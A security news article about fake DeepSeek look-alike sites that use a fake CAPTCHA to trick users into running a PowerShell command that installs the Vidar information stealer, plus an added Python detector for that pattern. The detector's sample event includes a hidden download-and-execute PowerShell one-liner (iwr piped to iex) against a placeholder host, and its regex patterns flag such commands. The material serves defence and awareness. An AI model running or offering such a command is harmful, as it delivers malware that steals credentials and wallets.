DeepSeek fame hijacked to empty wallets


Crafty scammers are setting up fake CAPTCHAs on DeepSeek look-alike sites to steal access to digital wallets.

Amid the DeepSeek hype, cybercriminals are seizing the opportunity to drain digital wallets. Numerous domains imitating the highly popular Chinese AI chatbot have been identified, posing a huge threat to unsuspecting users.

Fake websites that seem to be affiliated with DeepSeek are being utilized to steal credentials, seize browser cookies and autofill data, exfiltrate personal files, and access cryptocurrency wallets.


Security researchers at the cybersecurity firm Zscaler have identified nearly 40 malicious domains that distribute the Vidar information stealer.

The malware targets 80 cryptocurrency-related extensions, including widely used services such as MetaMask, Coinbase, Binance, and Trust Wallet. It also harvests stored data from popular browsers.

Image: Fake DeepSeek website. The DeepSeek-themed webpage prompting users to complete a fake partner registration. Source: Zscaler

Browsers targeted by the Vidar info stealer include:

  • Chrome
  • Microsoft Edge
  • Mozilla Firefox
  • Chromium
  • Opera
  • Opera Crypto
  • Opera GX
  • 360Browser
  • Tencent
  • Vivaldi
  • CryptoTab Browser
  • Epic Privacy Browser
  • CocCoc
  • CentBrowser
  • BraveSoftware

Apart from spreading dangerous malware, the fake sites have also been used for a handful of other malicious activities, including cryptocurrency pump-and-dump schemes, fake gift card scams, and the promotion of counterfeit gambling services.


How do attackers steal your credentials?


The malware campaign begins with users being tricked into believing that a fake website is affiliated with DeepSeek. Upon registration, users are redirected to a fake CAPTCHA page for verification.

CAPTCHA is a widely used security check that determines whether a user is a human or a bot. Here, however, the attackers exploit the familiar prompt to deliver malware onto the user's device.

Image: Fake DeepSeek CAPTCHA. Source: Zscaler

Once the user clicks the "I'm not a robot" box, JavaScript on the page automatically copies a malicious PowerShell command to the user's clipboard. The on-page verification instructions then tell the user to paste and execute that command in the Windows Run window.

If the user runs the PowerShell command, a packed Vidar malware file is downloaded and executed. From there, Vidar springs into action, locating sensitive files and harvesting data.
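The "paste it into Run" step described above leaves a recognisable footprint in endpoint telemetry: the Run dialog is hosted by explorer.exe, so the pasted one-liner shows up as a script interpreter whose parent is explorer.exe, carrying flags that hide the window and fetch a second stage. The detector below is an added example written for this article, not code from Zscaler or from the campaign; the sample events, the indicator weights and the alert threshold are assumptions constructed for illustration.

```python
import re
# Constructed sample process-creation events in a simplified Sysmon Event ID 1
# shape; they are illustrative and not telemetry from the real campaign.
SAMPLE_EVENTS = [
    {   # command pasted into Win+R, the "paste to verify" step described above
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -ep bypass -c "iwr http://placeholder.invalid/v | iex"',
    },
    {   # an administrator running a local script from a console
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -File C:\Scripts\cleanup.ps1",
    },
]
INTERPRETERS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe")
# Traits a pasted one-liner needs to run silently and fetch a second stage (weights and threshold are assumptions)
INDICATORS = {
    r"-w(indowstyle)?\s+hidden": 2,
    r"-e(xecutionpolicy|p)\s+bypass": 1,
    r"-e(nc|ncodedcommand|c)\s+[a-z0-9+/=]{20,}": 3,
    r"\b(iwr|invoke-webrequest|invoke-restmethod|downloadstring|curl)\b": 2,
    r"\b(iex|invoke-expression)\b": 2,
    r"https?://": 1,
}

def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    image = event["Image"].lower().rsplit("\\", 1)[-1]
    if image not in INTERPRETERS:
        return 0, []
    score, reasons = 0, []
    # The Run dialog is hosted by explorer.exe, so an interpreter whose parent
    # is explorer.exe is the footprint of a user following the fake CAPTCHA.
    if event["ParentImage"].lower().endswith("\\explorer.exe"):
        score, reasons = 2, ["interpreter spawned by explorer.exe (Run dialog)"]
    cmd = event["CommandLine"].lower()
    for pattern, weight in INDICATORS.items():
        if re.search(pattern, cmd):
            score += weight
            reasons.append(f"command line matches /{pattern}/")
    return score, reasons
def find_clickfix(events, threshold=5):
    hits = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append({"CommandLine": event["CommandLine"], "score": score, "reasons": reasons})
    return hits
```

Fed real Sysmon or EDR process-creation events, the same scoring flags the explorer.exe-to-PowerShell chain while leaving an administrator's console-launched script untouched; the `reasons` list is what an analyst would want in the alert.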

The malware conceals its command-and-control (C2) communication using legitimate platforms like Telegram and Steam.

Image: Malware injection. Fake CAPTCHA instructions that will execute malicious code. Source: Zscaler